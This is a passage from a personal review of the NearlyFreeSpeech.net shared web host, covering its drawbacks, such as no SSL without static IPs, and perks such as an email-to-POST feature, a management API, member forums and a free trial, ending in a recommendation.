heavy usage, provided your site's software is functioning correctly. Cons: To be honest, there aren't many. There are some though, so in the interest of completeness, here they are: No SSL The reasons for this are varied, and they're actively working to implement a solution. The short story is that, due to the architecture of their service, it's not quite as simple as "drop in a cert and tweak the httpd config". Essentially, since they don't assign static IPs for individual sites, they can't support SSL until all mainstream browsers support the SNI extension. No overselling Some people may think the lack of "unlimited bandwidth for $7.99/mo" is a con. Others think "unlimited bandwidth for $7.99/mo" is a con. Depends on your perspective and usage I guess. No Ruby on Rails Doesn't bother me, but it might be a deal-breaker for someone I suppose. Not your bog-standard cPanel + Linux box setup Some folks would say that this is a con, due to the lack of familiarity. Their control panel is different than a lot of hosts, but it's flexible, clean, and responsive, so it's fine for me. Perks One thing I've come to notice over 4+ years with NFS is that there are lots and lots of nice little features that aren't advertised, but that make life just a little easier. Examples: E-mail to POST Their mail forwarding can be configured to POST incoming messages (complete with attachments) to a specified URL. The format of this submission is documented on the member wiki. Member wiki Contains member-submitted documentation of NFSN's quirks, some of its special features, and how to best get different apps working on NFSN. Management API I haven't played around with it, so I can't provide too many details, but NearlyFreeSpeech offers a public API to allow for the programmatic management of user memberships, sites, DNS records, etc. Pretty cool, and not something I've seen elsewhere. Domain registration Cheap domains, simple registration process, and (unlike GoDaddy) they don't screw around with your registration just because you said something that they didn't like. Haskell support If you know what this is, you know why this is sweet ;-) Member forums Not terribly unique, but a great resource. Pretty much everyone there is quite friendly and happy to help new users. Free trial You can create a trial membership. This membership comes with $0.02 (IIRC) credit, and is a great way to tinker with their platform before depositing money. You can get a refund Sweet. Never had to use it though, but good to know I could if I had to. Humor A little thing, yes -- but it's good to see a host that actually seems like it's staffed by real people rather than bash scripts and stock photos. Member/staff interaction This is something I haven't seen with any other hosts. The staff interact with the users on the discussion forums. When a user asks "why do you do/say X", they get a response. They have discussions on why they decided to do/say X. Members ask for Y to be available through the web control panel, and some time later a staff member bumps the thread to point out that Y has been implemented. --- Verdict If you need shared hosting, you'd be doing yourself a disservice by not trying NearlyFreeSpeech.net
